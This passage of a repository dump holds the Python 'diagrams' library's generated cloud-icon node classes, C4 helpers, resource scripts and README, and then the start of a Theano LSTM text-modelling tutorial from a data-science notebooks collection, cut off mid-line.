"iot-analytics-pipeline.png" class IotAnalytics(_Iot): _icon = "iot-analytics.png" class IotBank(_Iot): _icon = "iot-bank.png" class IotBicycle(_Iot): _icon = "iot-bicycle.png" class IotButton(_Iot): _icon = "iot-button.png" class IotCamera(_Iot): _icon = "iot-camera.png" class IotCar(_Iot): _icon = "iot-car.png" class IotCart(_Iot): _icon = "iot-cart.png" class IotCertificate(_Iot): _icon = "iot-certificate.png" class IotCoffeePot(_Iot): _icon = "iot-coffee-pot.png" class IotCore(_Iot): _icon = "iot-core.png" class IotDesiredState(_Iot): _icon = "iot-desired-state.png" class IotDeviceDefender(_Iot): _icon = "iot-device-defender.png" class IotDeviceGateway(_Iot): _icon = "iot-device-gateway.png" class IotDeviceManagement(_Iot): _icon = "iot-device-management.png" class IotDoorLock(_Iot): _icon = "iot-door-lock.png" class IotEvents(_Iot): _icon = "iot-events.png" class IotFactory(_Iot): _icon = "iot-factory.png" class IotFireTvStick(_Iot): _icon = "iot-fire-tv-stick.png" class IotFireTv(_Iot): _icon = "iot-fire-tv.png" class IotGeneric(_Iot): _icon = "iot-generic.png" class IotGreengrassConnector(_Iot): _icon = "iot-greengrass-connector.png" class IotGreengrass(_Iot): _icon = "iot-greengrass.png" class IotHardwareBoard(_Iot): _icon = "iot-hardware-board.png" class IotHouse(_Iot): _icon = "iot-house.png" class IotHttp(_Iot): _icon = "iot-http.png" class IotHttp2(_Iot): _icon = "iot-http2.png" class IotJobs(_Iot): _icon = "iot-jobs.png" class IotLambda(_Iot): _icon = "iot-lambda.png" class IotLightbulb(_Iot): _icon = "iot-lightbulb.png" class IotMedicalEmergency(_Iot): _icon = "iot-medical-emergency.png" class IotMqtt(_Iot): _icon = "iot-mqtt.png" class IotOverTheAirUpdate(_Iot): _icon = "iot-over-the-air-update.png" class IotPolicyEmergency(_Iot): _icon = "iot-policy-emergency.png" class IotPolicy(_Iot): _icon = "iot-policy.png" class IotReportedState(_Iot): _icon = "iot-reported-state.png" class IotRule(_Iot): _icon = "iot-rule.png" class IotSensor(_Iot): _icon = "iot-sensor.png" class IotServo(_Iot): _icon = "iot-servo.png" class IotShadow(_Iot): _icon = "iot-shadow.png" class IotSimulator(_Iot): _icon = "iot-simulator.png" class IotSitewise(_Iot): _icon = "iot-sitewise.png" class IotThermostat(_Iot): _icon = "iot-thermostat.png" class IotThingsGraph(_Iot): _icon = "iot-things-graph.png" class IotTopic(_Iot): _icon = "iot-topic.png" class IotTravel(_Iot): _icon = "iot-travel.png" class IotUtility(_Iot): _icon = "iot-utility.png" class IotWindfarm(_Iot): _icon = "iot-windfarm.png" # Aliases FreeRTOS = Freertos IotBoard = IotHardwareBoard File: diagrams/aws/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _General(_AWS): _type = "general" _icon_dir = "resources/aws/general" class Client(_General): _icon = "client.png" class Disk(_General): _icon = "disk.png" class Forums(_General): _icon = "forums.png" class General(_General): _icon = "general.png" class GenericDatabase(_General): _icon = "generic-database.png" class GenericFirewall(_General): _icon = "generic-firewall.png" class GenericOfficeBuilding(_General): _icon = "generic-office-building.png" class GenericSamlToken(_General): _icon = "generic-saml-token.png" class GenericSDK(_General): _icon = "generic-sdk.png" class InternetAlt1(_General): _icon = "internet-alt1.png" class InternetAlt2(_General): _icon = "internet-alt2.png" class InternetGateway(_General): _icon = "internet-gateway.png" class Marketplace(_General): _icon = "marketplace.png" class MobileClient(_General): _icon = "mobile-client.png" class Multimedia(_General): _icon = "multimedia.png" class OfficeBuilding(_General): _icon = "office-building.png" class SamlToken(_General): _icon = "saml-token.png" class SDK(_General): _icon = "sdk.png" class SslPadlock(_General): _icon = "ssl-padlock.png" class TapeStorage(_General): _icon = "tape-storage.png" class Toolkit(_General): _icon = "toolkit.png" class TraditionalServer(_General): _icon = "traditional-server.png" class User(_General): _icon = "user.png" class Users(_General): _icon = "users.png" # Aliases OfficeBuilding = GenericOfficeBuilding File: diagrams/aws/engagement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Engagement(_AWS): _type = "engagement" _icon_dir = "resources/aws/engagement" class Connect(_Engagement): _icon = "connect.png" class CustomerEngagement(_Engagement): _icon = "customer-engagement.png" class Pinpoint(_Engagement): _icon = "pinpoint.png" class SimpleEmailServiceSesEmail(_Engagement): _icon = "simple-email-service-ses-email.png" class SimpleEmailServiceSes(_Engagement): _icon = "simple-email-service-ses.png" # Aliases SES = SimpleEmailServiceSes File: diagrams/aws/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Compute(_AWS): _type = "compute" _icon_dir = "resources/aws/compute" class AppRunner(_Compute): _icon = "app-runner.png" class ApplicationAutoScaling(_Compute): _icon = "application-auto-scaling.png" class Batch(_Compute): _icon = "batch.png" class ComputeOptimizer(_Compute): _icon = "compute-optimizer.png" class Compute(_Compute): _icon = "compute.png" class EC2Ami(_Compute): _icon = "ec2-ami.png" class EC2AutoScaling(_Compute): _icon = "ec2-auto-scaling.png" class EC2ContainerRegistryImage(_Compute): _icon = "ec2-container-registry-image.png" class EC2ContainerRegistryRegistry(_Compute): _icon = "ec2-container-registry-registry.png" class EC2ContainerRegistry(_Compute): _icon = "ec2-container-registry.png" class EC2ElasticIpAddress(_Compute): _icon = "ec2-elastic-ip-address.png" class EC2ImageBuilder(_Compute): _icon = "ec2-image-builder.png" class EC2Instance(_Compute): _icon = "ec2-instance.png" class EC2Instances(_Compute): _icon = "ec2-instances.png" class EC2Rescue(_Compute): _icon = "ec2-rescue.png" class EC2SpotInstance(_Compute): _icon = "ec2-spot-instance.png" class EC2(_Compute): _icon = "ec2.png" class ElasticBeanstalkApplication(_Compute): _icon = "elastic-beanstalk-application.png" class ElasticBeanstalkDeployment(_Compute): _icon = "elastic-beanstalk-deployment.png" class ElasticBeanstalk(_Compute): _icon = "elastic-beanstalk.png" class ElasticContainerServiceContainer(_Compute): _icon = "elastic-container-service-container.png" class ElasticContainerServiceService(_Compute): _icon = "elastic-container-service-service.png" class ElasticContainerService(_Compute): _icon = "elastic-container-service.png" class ElasticKubernetesService(_Compute): _icon = "elastic-kubernetes-service.png" class Fargate(_Compute): _icon = "fargate.png" class LambdaFunction(_Compute): _icon = "lambda-function.png" class Lambda(_Compute): _icon = "lambda.png" class Lightsail(_Compute): _icon = "lightsail.png" class LocalZones(_Compute): _icon = "local-zones.png" class Outposts(_Compute): _icon = "outposts.png" class ServerlessApplicationRepository(_Compute): _icon = "serverless-application-repository.png" class ThinkboxDeadline(_Compute): _icon = "thinkbox-deadline.png" class ThinkboxDraft(_Compute): _icon = "thinkbox-draft.png" class ThinkboxFrost(_Compute): _icon = "thinkbox-frost.png" class ThinkboxKrakatoa(_Compute): _icon = "thinkbox-krakatoa.png" class ThinkboxSequoia(_Compute): _icon = "thinkbox-sequoia.png" class ThinkboxStoke(_Compute): _icon = "thinkbox-stoke.png" class ThinkboxXmesh(_Compute): _icon = "thinkbox-xmesh.png" class VmwareCloudOnAWS(_Compute): _icon = "vmware-cloud-on-aws.png" class Wavelength(_Compute): _icon = "wavelength.png" # Aliases AutoScaling = ApplicationAutoScaling AMI = EC2Ami ECR = EC2ContainerRegistry EB = ElasticBeanstalk ECS = ElasticContainerService EKS = ElasticKubernetesService SAR = ServerlessApplicationRepository File: diagrams/c4/__init__.py """ A set of nodes and edges to visualize software architecture using the C4 model. """ import html import textwrap from diagrams import Cluster, Node, Edge def _format_node_label(name, key, description): """Create a graphviz label string for a C4 node""" title = f'<font point-size="12"><b>{html.escape(name)}</b></font><br/>' subtitle = f'<font point-size="9">[{html.escape(key)}]<br/></font>' if key else "" text = f'<br/><font point-size="10">{_format_description(description)}</font>' if description else "" return f"<{title}{subtitle}{text}>" def _format_description(description): """ Formats the description string so it fits into the C4 nodes. It line-breaks the description so it fits onto exactly three lines. If there are more than three lines, all further lines are discarded and "..." inserted on the last line to indicate that it was shortened. This will also html-escape the description so it can safely be included in a HTML label. """ wrapper = textwrap.TextWrapper(width=40, max_lines=3) lines = [html.escape(line) for line in wrapper.wrap(description)] lines += [""] * (3 - len(lines)) # fill up with empty lines so it is always three return "<br/>".join(lines) def _format_edge_label(description): """Create a graphviz label string for a C4 edge""" wrapper = textwrap.TextWrapper(width=24, max_lines=3) lines = [html.escape(line) for line in wrapper.wrap(description)] text = "<br/>".join(lines) return f'<<font point-size="10">{text}</font>>' def C4Node(name, technology="", description="", type="Container", **kwargs): key = f"{type}: {technology}" if technology else type node_attributes = { "label": _format_node_label(name, key, description), "labelloc": "c", "shape": "rect", "width": "2.6", "height": "1.6", "fixedsize": "true", "style": "filled", "fillcolor": "dodgerblue3", "fontcolor": "white", } # collapse boxes to a smaller form if they don't have a description if not description: node_attributes.update({"width": "2", "height": "1"}) node_attributes.update(kwargs) return Node(**node_attributes) def Container(name, technology="", description="", **kwargs): container_attributes = { "name": name, "technology": technology, "description": description, "type": "Container", } container_attributes.update(kwargs) return C4Node(**container_attributes) def Database(name, technology="", description="", **kwargs): database_attributes = { "name": name, "technology": technology, "description": description, "type": "Database", "shape": "cylinder", "labelloc": "b", } database_attributes.update(kwargs) return C4Node(**database_attributes) def System(name, description="", external=False, **kwargs): system_attributes = { "name": name, "description": description, "type": "External System" if external else "System", "fillcolor": "gray60" if external else "dodgerblue4", } system_attributes.update(kwargs) return C4Node(**system_attributes) def Person(name, description="", external=False, **kwargs): person_attributes = { "name": name, "description": description, "type": "External Person" if external else "Person", "fillcolor": "gray60" if external else "dodgerblue4", "style": "rounded,filled", } person_attributes.update(kwargs) return C4Node(**person_attributes) def SystemBoundary(name, **kwargs): graph_attributes = { "label": html.escape(name), "bgcolor": "white", "margin": "16", "style": "dashed", } graph_attributes.update(kwargs) return Cluster(name, graph_attr=graph_attributes) def Relationship(label="", **kwargs): edge_attributes = { "style": "dashed", "color": "gray60", "label": _format_edge_label(label) if label else "", } edge_attributes.update(kwargs) return Edge(**edge_attributes) File: diagrams/custom/__init__.py """ Custom provides the possibility of load an image to be presented as a node. """ from diagrams import Node class Custom(Node): _provider = "custom" _type = "custom" _icon_dir = None fontcolor = "#ffffff" def _load_icon(self): return self._icon def __init__(self, label, icon_path, *args, **kwargs): self._icon = icon_path super().__init__(label, *args, **kwargs) File: diagrams/saas/logging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Logging(_Saas): _type = "logging" _icon_dir = "resources/saas/logging" class Datadog(_Logging): _icon = "datadog.png" class Newrelic(_Logging): _icon = "newrelic.png" class Papertrail(_Logging): _icon = "papertrail.png" # Aliases DataDog = Datadog NewRelic = Newrelic File: diagrams/saas/media.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Media(_Saas): _type = "media" _icon_dir = "resources/saas/media" class Cloudinary(_Media): _icon = "cloudinary.png" # Aliases File: diagrams/saas/social.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Social(_Saas): _type = "social" _icon_dir = "resources/saas/social" class Facebook(_Social): _icon = "facebook.png" class Twitter(_Social): _icon = "twitter.png" # Aliases File: diagrams/saas/filesharing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Filesharing(_Saas): _type = "filesharing" _icon_dir = "resources/saas/filesharing" class Nextcloud(_Filesharing): _icon = "nextcloud.png" # Aliases File: diagrams/saas/__init__.py """ Saas provides a set of general saas services. """ from diagrams import Node class _Saas(Node): _provider = "saas" _icon_dir = "resources/saas" fontcolor = "#ffffff" File: diagrams/saas/recommendation.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Recommendation(_Saas): _type = "recommendation" _icon_dir = "resources/saas/recommendation" class Recombee(_Recommendation): _icon = "recombee.png" # Aliases File: diagrams/saas/chat.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Chat(_Saas): _type = "chat" _icon_dir = "resources/saas/chat" class Discord(_Chat): _icon = "discord.png" class Line(_Chat): _icon = "line.png" class Mattermost(_Chat): _icon = "mattermost.png" class Messenger(_Chat): _icon = "messenger.png" class RocketChat(_Chat): _icon = "rocket-chat.png" class Slack(_Chat): _icon = "slack.png" class Teams(_Chat): _icon = "teams.png" class Telegram(_Chat): _icon = "telegram.png" # Aliases File: diagrams/saas/cdn.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Cdn(_Saas): _type = "cdn" _icon_dir = "resources/saas/cdn" class Akamai(_Cdn): _icon = "akamai.png" class Cloudflare(_Cdn): _icon = "cloudflare.png" class Fastly(_Cdn): _icon = "fastly.png" # Aliases File: diagrams/saas/communication.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Communication(_Saas): _type = "communication" _icon_dir = "resources/saas/communication" class Twilio(_Communication): _icon = "twilio.png" # Aliases File: diagrams/saas/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Analytics(_Saas): _type = "analytics" _icon_dir = "resources/saas/analytics" class Dataform(_Analytics): _icon = "dataform.png" class Snowflake(_Analytics): _icon = "snowflake.png" class Stitch(_Analytics): _icon = "stitch.png" # Aliases File: diagrams/saas/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Identity(_Saas): _type = "identity" _icon_dir = "resources/saas/identity" class Auth0(_Identity): _icon = "auth0.png" class Okta(_Identity): _icon = "okta.png" # Aliases File: diagrams/saas/alerting.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Saas class _Alerting(_Saas): _type = "alerting" _icon_dir = "resources/saas/alerting" class Newrelic(_Alerting): _icon = "newrelic.png" class Opsgenie(_Alerting): _icon = "opsgenie.png" class Pagerduty(_Alerting): _icon = "pagerduty.png" class Pushover(_Alerting): _icon = "pushover.png" class Xmatters(_Alerting): _icon = "xmatters.png" # Aliases File: diagrams/base/__init__.py """ Base provides a set of general services for backend infrastructure. """ from diagrams import Node class _Base(Node): _provider = "base" _icon_dir = "resources/base" fontcolor = "#ffffff" File: scripts/generate.py import os import sys from typing import Iterable from jinja2 import Environment, FileSystemLoader, Template, exceptions import config as cfg from . import app_root_dir, doc_root_dir, resource_dir, template_dir, base_dir _usage = "Usage: generate.py <provider>" def load_tmpl(tmpl: str) -> Template: env = Environment(loader=FileSystemLoader(template_dir())) env.filters["up_or_title"] = up_or_title return env.get_template(tmpl) def up_or_title(pvd: str, s: str) -> str: if s in cfg.UPPER_WORDS.get(pvd, ()): return s.upper() if s in cfg.TITLE_WORDS.get(pvd, {}): return cfg.TITLE_WORDS[pvd][s] return s.title() def gen_classes(pvd: str, typ: str, paths: Iterable[str]) -> str: """Generate all service node classes based on resources paths with class templates.""" tmpl = load_tmpl(cfg.TMPL_MODULE) # TODO: extract the gen class metas for sharing # TODO: independent function for generating all pvd/typ/paths pairs def _gen_class_meta(path: str) -> dict: base = os.path.splitext(path)[0] name = "".join([up_or_title(pvd, s) for s in base.split("-")]) return {"name": name, "icon": path} metas = map(_gen_class_meta, paths) aliases = cfg.ALIASES[pvd][typ] if typ in cfg.ALIASES[pvd] else {} return tmpl.render(pvd=pvd, typ=typ, metas=metas, aliases=aliases) def gen_apidoc(pvd: str, typ_paths: dict) -> str: try: default_tmp = cfg.TMPL_APIDOC.split('.') tmpl_file = f"{default_tmp[0]}_{pvd}.{default_tmp[1]}" tmpl = load_tmpl(tmpl_file) except exceptions.TemplateNotFound: tmpl = load_tmpl(cfg.TMPL_APIDOC) # TODO: remove def _gen_class_name(path: str) -> str: base = os.path.splitext(path)[0] name = "".join([up_or_title(pvd, s) for s in base.split("-")]) return name typ_classes = {} for typ, (paths, resource_root) in sorted(typ_paths.items()): typ_classes[typ] = [] for path in paths: name = _gen_class_name(path) resource_path = os.path.join(resource_root, path) alias = cfg.ALIASES[pvd].get(typ, {}).get(name) typ_classes[typ].append({"name": name, "alias": alias, "resource_path": resource_path}) return tmpl.render(pvd=pvd, typ_classes=typ_classes) def make_module(pvd: str, typ: str, classes: str) -> None: """Create a module file""" mod_path = os.path.join(app_root_dir(pvd), f"{typ}.py") with open(mod_path, "w+") as f: f.write(classes) def make_apidoc(pvd: str, content: str) -> None: """Create an api documentation file""" mod_path = os.path.join(doc_root_dir(), f"{pvd}.md") with open(mod_path, "w+") as f: f.write(content) def generate(pvd: str) -> None: """Generates a service node classes.""" typ_paths = {} base = base_dir() for root, _, files in os.walk(resource_dir(pvd)): # Extract the names and paths from resources. files.sort() pngs = list(filter(lambda f: f.endswith(".png"), files)) paths = list(filter(lambda f: "rounded" not in f, pngs)) # Skip the top-root directory. typ = os.path.basename(root) if typ == pvd: continue resource_root = os.path.relpath(root, base) classes = gen_classes(pvd, typ, paths) make_module(pvd, typ, classes) typ_paths[typ] = (paths, resource_root) # Build API documentation apidoc = gen_apidoc(pvd, typ_paths) make_apidoc(pvd, apidoc) if __name__ == "__main__": pvd = sys.argv[1] if pvd not in cfg.PROVIDERS: sys.exit() generate(pvd) File: scripts/resource.py """ resources.py provides useful tools for resources processing. There are 2 commands available. - clean: clean and unify the resources file names with some rules. - round: generate the rounded images from the original squared images. """ import os import subprocess import sys import config as cfg from . import resource_dir _usage = "Usage: resource.py <cmd> <pvd>" def cleaner_onprem(f): f = f.replace("_", "-") return f.lower() def cleaner_aws(f): f = f.replace("_", "-") f = f.replace("@4x", "") f = f.replace("@5x", "") f = f.replace("2.0", "2-0") f = f.replace("-light-bg4x", "") f = f.replace("-light-bg", "") for p in cfg.FILE_PREFIXES["aws"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_azure(f): f = f.replace("_", "-") f = f.replace("(", "").replace(")", "") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["azure"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_gcp(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["gcp"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_ibm(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["ibm"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_firebase(f): f = f.replace("_", "-") f = "-".join(f.split()) for p in cfg.FILE_PREFIXES["firebase"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_k8s(f): f = f.replace("-256", "") for p in cfg.FILE_PREFIXES["k8s"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_digitalocean(f): f = f.replace("-32", "") for p in cfg.FILE_PREFIXES["digitalocean"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_alibabacloud(f): for p in cfg.FILE_PREFIXES["alibabacloud"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_oci(f): f = f.replace(" ", "-") f = f.replace("_", "-") for p in cfg.FILE_PREFIXES["oci"]: if f.startswith(p): f = f[len(p) :] break return f.lower() def cleaner_programming(f): return f.lower() def cleaner_generic(f): return f.lower() def cleaner_saas(f): return f.lower() def cleaner_elastic(f): return f.lower() def cleaner_outscale(f): return f.lower() def cleaner_openstack(f): return f.lower() cleaners = { "onprem": cleaner_onprem, "aws": cleaner_aws, "azure": cleaner_azure, "digitalocean": cleaner_digitalocean, "gcp": cleaner_gcp, "ibm": cleaner_ibm, "firebase": cleaner_firebase, "k8s": cleaner_k8s, "alibabacloud": cleaner_alibabacloud, "oci": cleaner_oci, "programming": cleaner_programming, "saas": cleaner_saas, "elastic": cleaner_elastic, "outscale": cleaner_outscale, "generic": cleaner_generic, "openstack": cleaner_openstack, } def clean_png(pvd: str) -> None: """Refine the resources files names.""" def _rename(base: str, png: str): new = cleaners[pvd](png) old_path = os.path.join(base, png) new_path = os.path.join(base, new) os.rename(old_path, new_path) for root, _, files in os.walk(resource_dir(pvd)): pngs = filter(lambda f: f.endswith(".png"), files) [_rename(root, png) for png in pngs] def round_png(pvd: str) -> None: """Round the images.""" def _round(base: str, path: str): path = os.path.join(base, path) subprocess.run([cfg.CMD_ROUND, *cfg.CMD_ROUND_OPTS, path]) for root, _, files in os.walk(resource_dir(pvd)): pngs = filter(lambda f: f.endswith(".png"), files) paths = filter(lambda f: "rounded" not in f, pngs) [_round(root, path) for path in paths] def svg2png(pvd: str) -> None: """Convert the svg into png""" def _convert(base: str, path: str): path = os.path.join(base, path) subprocess.run([cfg.CMD_SVG2PNG, *cfg.CMD_SVG2PNG_OPTS, path]) subprocess.run(["rm", path]) for root, _, files in os.walk(resource_dir(pvd)): svgs = filter(lambda f: f.endswith(".svg"), files) [_convert(root, path) for path in svgs] def svg2png2(pvd: str) -> None: """Convert the svg into png using image magick""" def _convert(base: str, path: str): path_src = os.path.join(base, path) path_dest = path_src.replace(".svg", ".png") subprocess.run([cfg.CMD_SVG2PNG_IM, *cfg.CMD_SVG2PNG_IM_OPTS, path_src, path_dest]) subprocess.run(["rm", path_src]) for root, _, files in os.walk(resource_dir(pvd)): svgs = filter(lambda f: f.endswith(".svg"), files) [_convert(root, path) for path in svgs] # fmt: off commands = { "clean": clean_png, "round": round_png, "svg2png": svg2png, "svg2png2": svg2png2, } # fmt: on if __name__ == "__main__": if len(sys.argv) < 3: print(_usage) sys.exit() cmd = sys.argv[1] pvd = sys.argv[2] if cmd not in commands: sys.exit() if pvd not in cfg.PROVIDERS: sys.exit() commands[cmd](pvd) File: scripts/__init__.py import os from pathlib import Path import config as cfg def base_dir() -> Path: return Path(os.path.abspath(os.path.dirname(__file__))).parent def app_root_dir(pvd: str) -> str: return os.path.join(base_dir(), cfg.DIR_APP_ROOT, pvd) def doc_root_dir() -> str: return os.path.join(base_dir(), cfg.DIR_DOC_ROOT) def resource_dir(pvd: str) -> str: return os.path.join(base_dir(), cfg.DIR_RESOURCE, pvd) def template_dir() -> str: return os.path.join(base_dir(), cfg.DIR_TEMPLATE)
![diagrams logo](assets/img/diagrams.png) # Diagrams [![license](https://img.shields.io/badge/license-MIT-blue.svg)](/LICENSE) [![pypi version](https://badge.fury.io/py/diagrams.svg)](https://badge.fury.io/py/diagrams) ![python version](https://img.shields.io/badge/python-%3E%3D%203.6-blue?logo=python) ![Run tests](https://github.com/mingrammer/diagrams/workflows/Run%20tests/badge.svg?branch=master) [![todos](https://badgen.net/https/api.tickgit.com/badgen/github.com/mingrammer/diagrams?label=todos)](https://www.tickgit.com/browse?repo=github.com/mingrammer/diagrams) ![contributors](https://img.shields.io/github/contributors/mingrammer/diagrams) <a href="https://www.buymeacoffee.com/mingrammer" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a> **Diagram as Code**. Diagrams lets you draw the cloud system architecture **in Python code**. It was born for **prototyping** a new system architecture design without any design tools. You can also describe or visualize the existing system architecture as well. Diagrams currently supports main major providers including: `AWS`, `Azure`, `GCP`, `Kubernetes`, `Alibaba Cloud`, `Oracle Cloud` etc... It also supports `On-Premise` nodes, `SaaS` and major `Programming` frameworks and languages. **Diagram as Code** also allows you to **track** the architecture diagram changes in any **version control** system. > NOTE: It does not control any actual cloud resources nor does it generate cloud formation or terraform code. It is just for drawing the cloud system architecture diagrams. ## Providers ![aws provider](https://img.shields.io/badge/AWS-orange?logo=amazon-aws&color=ff9900) ![azure provider](https://img.shields.io/badge/Azure-orange?logo=microsoft-azure&color=0089d6) ![gcp provider](https://img.shields.io/badge/GCP-orange?logo=google-cloud&color=4285f4) ![ibm provider](https://img.shields.io/badge/IBM-orange?logo=ibm&color=052FAD) ![kubernetes provider](https://img.shields.io/badge/Kubernetes-orange?logo=kubernetes&color=326ce5) ![alibaba cloud provider](https://img.shields.io/badge/AlibabaCloud-orange?logo=alibaba-cloud&color=ff6a00) ![oracle cloud provider](https://img.shields.io/badge/OracleCloud-orange?logo=oracle&color=f80000) ![openstack provider](https://img.shields.io/badge/OpenStack-orange?logo=openstack&color=da1a32) ![firebase provider](https://img.shields.io/badge/Firebase-orange?logo=firebase&color=FFCA28) ![digital ocean provider](https://img.shields.io/badge/DigitalOcean-0080ff?logo=digitalocean&color=0080ff) ![elastic provider](https://img.shields.io/badge/Elastic-orange?logo=elastic&color=005571) ![outscale provider](https://img.shields.io/badge/OutScale-orange?color=5f87bf) ![on premise provider](https://img.shields.io/badge/OnPremise-orange?color=5f87bf) ![generic provider](https://img.shields.io/badge/Generic-orange?color=5f87bf) ![programming provider](https://img.shields.io/badge/Programming-orange?color=5f87bf) ![saas provider](https://img.shields.io/badge/SaaS-orange?color=5f87bf) ![c4 provider](https://img.shields.io/badge/C4-orange?color=5f87bf) ## Getting Started It requires **Python 3.7** or higher, check your Python version first. It uses [Graphviz](https://www.graphviz.org/) to render the diagram, so you need to [install Graphviz](https://graphviz.gitlab.io/download/) to use **diagrams**. After installing graphviz (or already have it), install the **diagrams**. > macOS users can download the Graphviz via `brew install graphviz` if you're using [Homebrew](https://brew.sh). ```shell # using pip (pip3) $ pip install diagrams # using pipenv $ pipenv install diagrams # using poetry $ poetry add diagrams ``` You can start with [quick start](https://diagrams.mingrammer.com/docs/getting-started/installation#quick-start). Check out [guides](https://diagrams.mingrammer.com/docs/guides/diagram) for more details, and you can find all available nodes list in [here](https://diagrams.mingrammer.com/docs/nodes/aws). ## Examples | Event Processing | Stateful Architecture | Advanced Web Service | | ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ | | ![event processing](https://diagrams.mingrammer.com/img/event_processing_diagram.png) | ![stateful architecture](https://diagrams.mingrammer.com/img/stateful_architecture_diagram.png) | ![advanced web service with on-premise](https://diagrams.mingrammer.com/img/advanced_web_service_with_on-premise.png) | You can find all the examples on the [examples](https://diagrams.mingrammer.com/docs/getting-started/examples) page. ## Contributing To contribute to diagram, check out [contribution guidelines](CONTRIBUTING.md). > Let me know if you are using diagrams! I'll add you in showcase page. (I'm working on it!) :) ## Who uses it? [Apache Airflow](https://github.com/apache/airflow) is the most popular data workflow Orchestrator. Airflow uses Diagrams to generate architecture diagrams in their documentation. [Cloudiscovery](https://github.com/Cloud-Architects/cloudiscovery) helps you to analyze resources in your cloud (AWS/GCP/Azure/Alibaba/IBM) account. It allows you to create a diagram of analyzed cloud resource map based on this Diagrams library, so you can draw your existing cloud infrastructure with Cloudiscovery. [Airflow Diagrams](https://github.com/feluelle/airflow-diagrams) is an Airflow plugin that aims to easily visualise your Airflow DAGs on service level from providers like AWS, GCP, Azure, etc. via diagrams. ## Other languages - If you are familiar with Go, you can use [go-diagrams](https://github.com/blushft/go-diagrams) as well. ## License [MIT](LICENSE)
data-science-ipython-notebooks
5b3c00d462c6e9200315afe46d0093948621eb95
File: __init__.py File: deep-learning/theano-tutorial/rnn_tutorial/lstm_text.py import cPickle as pkl import time import numpy import theano from theano import config import theano.tensor as T from theano.tensor.nnet import categorical_crossentropy from fuel.datasets import TextFile from fuel.streams import DataStream from fuel.schemes import ConstantScheme from fuel.transformers import Batch, Padding # These files can be downloaded from # http://www-etud.iro.umontreal.ca/~brakelp/train.txt.gz # http://www-etud.iro.umontreal.ca/~brakelp/dictionary.pkl # don't forget to change the paths and gunzip train.txt.gz TRAIN_FILE = '/u/brakelp/temp/traindata.txt' VAL_FILE = '/u/brakelp/temp/valdata.txt' DICT_FILE = '/u/brakelp/temp/dictionary.pkl' def sequence_categorical_crossentropy(prediction, targets, mask): prediction_flat = prediction.reshape(((prediction.shape[0] * prediction.shape[1]), prediction.shape[2]), ndim=2) targets_flat = targets.flatten() mask_flat = mask.flatten() ce = categorical_crossentropy(prediction_flat, targets_flat) return T.sum(ce * mask_flat) def gauss_weight(ndim_in, ndim_out=None, sd=.005): if ndim_out is None: ndim_out = ndim_in W = numpy.random.randn(ndim_in, ndim_out) * sd return numpy.asarray(W, dtype=config.floatX) class LogisticRegression(object): """Multi-class Logistic Regression Class The logistic regression is fully described by a weight matrix :math:`W` and bias vector :math:`b`. Classification is done by projecting data points onto a set of hyperplanes, the distance to which is used to determine a class membership probability. """ def __init__(self, input, n_in, n_out): """ Initialize the parameters of the logistic regression :type input: theano.tensor.TensorType :param input: symbolic variable that describes the input of the architecture (one minibatch) :type n_in: int :param n_in: number of input units, the dimension of the space in which the datapoints lie :type n_out: int :param n_out: number of output units, the dimension of the space in which the labels lie """ # initialize with 0 the weights W as a matrix of shape (n_in, n_out) self.W = theano.shared(value=numpy.zeros((n_in, n_out), dtype=theano.config.floatX), name='W', borrow=True) # initialize the baises b as a vector of n_out 0s self.b = theano.shared(value=numpy.zeros((n_out,), dtype=theano.config.floatX), name='b', borrow=True) # compute vector of class-membership probabilities in symbolic form energy = T.dot(input, self.W) + self.b energy_exp = T.exp(energy - T.max(energy, 2)[:, :, None]) pmf = energy_exp / energy_exp.sum(2)[:, :, None] self.p_y_given_x = pmf # compute prediction as class whose probability is maximal in # symbolic form self.y_pred = T.argmax(self.p_y_given_x, axis=1) # parameters of the model self.params = [self.W, self.b] def index_dot(indices, w): return w[indices.flatten()] class LstmLayer: def __init__(self, rng, input, mask, n_in, n_h): # Init params self.W_i = theano.shared(gauss_weight(n_in, n_h), 'W_i', borrow=True) self.W_f = theano.shared(gauss_weight(n_in, n_h), 'W_f', borrow=True) self.W_c = theano.shared(gauss_weight(n_in, n_h), 'W_c', borrow=True) self.W_o = theano.shared(gauss_weight(n_in, n_h), 'W_o', borrow=True) self.U_i = theano.shared(gauss_weight(n_h), 'U_i', borrow=True) self.U_f = theano.shared(gauss_weight(n_h), 'U_f', borrow=True) self.U_c = theano.shared(gauss_weight(n_h), 'U_c', borrow=True) self.U_o = theano.shared(gauss_weight(n_h), 'U_o', borrow=True) self.b_i = theano.shared(numpy.zeros((n_h,), dtype=config.floatX), 'b_i', borrow=True) self.b_f = theano.shared(numpy.zeros((n_h,), 